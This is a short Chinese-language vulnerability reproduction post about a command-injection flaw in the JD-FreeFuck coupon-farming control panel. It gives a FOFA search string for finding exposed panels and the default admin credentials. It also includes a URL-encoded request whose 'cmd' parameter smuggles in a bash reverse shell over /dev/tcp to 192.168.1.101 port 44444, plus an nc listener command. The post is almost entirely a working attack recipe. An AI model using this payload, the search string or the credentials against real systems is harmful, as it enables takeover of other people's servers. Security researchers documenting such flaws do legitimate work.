漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

JD-FreeFuck 后台命令执行漏洞

默认用户名密码:

useradmin
supermanito

JD-FreeFuck 后台命令执行漏洞

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

JD-FreeFuck 后台命令执行漏洞

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444

相关文章:

  • 2022-01-26
  • 2021-09-01
  • 2021-11-07
  • 2021-09-18
猜你喜欢
  • 2021-12-23
相关资源
相似解决方案